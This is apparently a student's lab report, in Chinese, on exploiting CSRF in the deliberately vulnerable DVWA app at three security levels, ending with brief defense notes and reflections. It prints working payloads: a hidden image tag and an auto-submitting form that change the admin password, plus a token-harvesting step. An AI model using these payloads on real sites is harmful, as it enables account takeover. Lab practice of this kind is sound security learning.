DVWA CSRF 漏洞实践报告

1. 漏洞简介

CSRF(跨站请求伪造)是一种攻击,使得攻击者能够以受害者的身份执行非预期的操作。在靶场DVWA中,我将尝试通过CSRF漏洞更改管理员密码。

2. 实验环境

  • DVWA版本:DVWA-old
  • 浏览器:火狐
  • 默认管理员账户:admin / password

3. 漏洞利用过程

3.1 Low 级别

步骤:
  1. 登录DVWA,将安全级别设置为Low
  1. 访问CSRF页面,观察更改密码的表单
  1. 先尝试在页面修改初始密码为"123",点击"Change(更改)"后,就出现下面的链接。
  1. 复制上面的 url,用Notepad+创建一个包含以下内容的HTML文件,命名为"csrf_attack.html"
html 复制代码
<img src="http://127.0.0.1/DVWA-old/vulnerabilities/csrf/?
password_new=hacked&password_conf=hacked&Change=Change" style="display:none;" />
  1. 在管理员已登录的状态下访问这个HTML文件 (注:一定要在同一个浏览器中打开)
  1. 最后,尝试使用新密码"hacked"登录
结果:
  • 攻击成功:能够使用"hacked"作为新密码登录,证实了密码已被更改。
  • 无用户交互:整个过程中,受害用户(管理员)没有直接在DVWA网站上执行任何操作。
    成功使用新密码"hacked"登录DVWA系统。

3.2 Medium 级别

步骤:
  1. 将安全级别设置为Medium
  1. 创建一个新的HTML文件,内容如下:
html 复制代码
<form action="http:///127.0.0.1/DVWA-old/vulnerabilities/csrf/" method="GET">
  <input type="hidden" name="password_new" value="hacked2">
  <input type="hidden" name="password_conf" value="hacked2">
  <input type="hidden" name="Change" value="Change">
</form>
<script>document.forms[0].submit();</script>
  1. 在管理员已登录的状态下访问这个HTML文件
  1. 尝试使用新密码"hacked2"登录
结果:
  • 攻击成功:在Medium安全级别下,成功更改了目标账户的密码。
  • 验证方法:使用新设置的密码成功登录DVWA系统,证实密码已被更改。

在DVWA的Medium安全级别下,我成功执行了CSRF攻击并更改了目标账户的密码,这表明尽管系统可能增加了一些基本的防御措施(如Referer检查或简单的令牌),但这些措施仍然不足以有效防止CSRF攻击。

与Low级别相比,Medium级别可能需要稍微复杂一些的攻击脚本来绕过这些基本安全检查,但攻击的成功执行凸显了即使在提高安全意识的情况下,如果没有实施更强大和全面的保护机制,Web应用程序仍然容易受到CSRF等攻击的影响。

这个结果强调了持续安全评估和多层次防御策略的重要性。


3.3 High 级别

步骤:
  1. 将安全级别设置为High
    (如图所示,进行相应操作即可完成安全级别的设置。)

  2. 观察 CSRF 页面的 URL,可发现其中包含 user_token。

  3. 尝试以下步骤:

先在DVWA中创建一个存储型XSS漏洞

  • 找到一个可以输入并存储数据的功能,通常是留言板或用户资料页面。
  • 在输入框中插入以下代码:
bash 复制代码
<img src="DVWA-old/vulnerabilities/csrf/?
password_new=password&password_conf=password&
Change=Change&user_token=d07b9b7912edf5f7c47afd29e44efb64#">

但是,发现这个留言板有字数限制,如下:

接下来,打开 "检查" 功能,将 Maxlength="50" 更改为 "500"。

但即便将有 token 的那个链接复制粘贴并且更改了长度,再输入同样的代码,显示空白,依然没有成功。

测试失败了。没关系,那么,我再尝试一下其他方法。


那么,这一次直接复制自己在 CSRF 设置的密码成功的链接,然后将其复制到一个新的标签页上。(注意:先暂时不要输入。)
上图打圈的部分是原链接 将原链接直接复制粘贴到新建的页面上

接下来,右击"检查",在"控制台"里输入输入shuru以下代码来获取 user_token:

bash 复制代码
document.getElementsByName("user_token")

然后,使用获取到的token在新标签页面里构造新的CSRF攻击。更改的过程细节如下:

原链接:

127.0.0.1/DVWA-old/vulnerabilities/csrf/?password_new=password &password_conf=password&Change=Change&

user_token=d07b9b7912edf5f7c47afd29e44efb64#

更改成:

127.0.0.1/DVWA-old/vulnerabilities/csrf/?password_new=123 &password_conf=123&Change=Change&

user_token=b6c092cedbfd6f750e0b4a40f8f24ea7#

结果

测试成功,成功实现了在 High 级别下的 CSRF 攻击利用。

4. 防御措施

根据不同级别的防御措施,总结以下几点:

  • Low:几乎没有防御
  • Medium:检查Referer头
  • High:使用anti-CSRF token

5. 学习心得

在进行 DVWA 中 CSRF 漏洞利用的实验过程中,我收获了许多宝贵的经验和深刻的感悟。

这个实验并非一帆风顺,从 Low 级别到 High 级别,每一步都充满了挑战。尤其是在 High 级别中,遇到了诸多障碍,如留言板的字数限制、初次尝试的失败等。然而,正是这些困难让我深刻体会到了永不放弃的重要性。

当面对一次次的失败时,心中也曾有过沮丧和迷茫。但我明白,放弃就意味着前功尽弃,只有坚持下去,不断尝试新的方法,才有可能找到突破的路径。于是,我一遍又一遍地审视问题,分析失败的原因,从不同的角度去思考解决方案。

在不断尝试的过程中,我不仅锻炼了自己的技术能力,更培养了坚韧不拔的毅力和解决问题的能力。我学会了在困境中保持冷静,不被挫折打倒,积极寻找新的思路和方法。

通过这次实验,我也更加深刻地认识到网络安全的重要性和复杂性。CSRF 漏洞的存在可能给系统带来严重的安全威胁,而不同安全级别的设置虽然在一定程度上增加了攻击的难度,但也并非绝对安全。这提醒着我们在实际的网络应用开发和维护中,必须高度重视安全问题,采取更加严格和有效的防御措施。

同时,这次实验也让我明白,学习是一个不断探索和尝试的过程。我们不能害怕失败,而应该把失败看作是成长的机会。只有在不断的实践和尝试中,我们才能不断提升自己的能力,掌握更多的知识和技能。

总之,这次 CSRF 漏洞实验是一次极具价值的学习经历。它让我懂得了坚持的力量,培养了我的问题解决能力,也加深了我对网络安全的认识。在未来的学习和工作中,我将继续保持这种不放弃的精神,勇于面对各种挑战,不断提升自己,为网络安全事业贡献自己的一份力量。

6. 注意事项

  • 仅在授权的环境中进行测试
  • 不要在真实的生产环境中尝试这些攻击
  • 学习CSRF漏洞的目的是为了更好地理解和防御此类攻击

7. 参考资料

相关推荐
toto4122 分钟前
线程安全与线程不安全
java·开发语言·安全
maimang093 小时前
关于UDP缓冲区和丢包统计
网络
tjjingpan3 小时前
HCIA-Access V2.5_4_2_静态路由介绍
网络
follycat3 小时前
bestphp‘s revenge
学习·web安全
CESS_Cloud3 小时前
CESS 出席华盛顿区块链政策峰会:参与国家安全与数据隐私保护专题讨论
安全·阿里云·web3·去中心化·区块链
黑客K-ing4 小时前
网络安全防范
linux·服务器·web安全
这题怎么做?!?4 小时前
ARP协议及其具体过程
运维·服务器·网络
无线认证x英利检测4 小时前
进网许可认证、交换路由设备检测项目更新25年1月起
网络·智能路由器
卡卡大怪兽4 小时前
fastAPI接口的请求与响应——基础
服务器·网络·fastapi
昌sit!5 小时前
监控IP频繁登录服务器脚本
服务器·网络·tcp/ip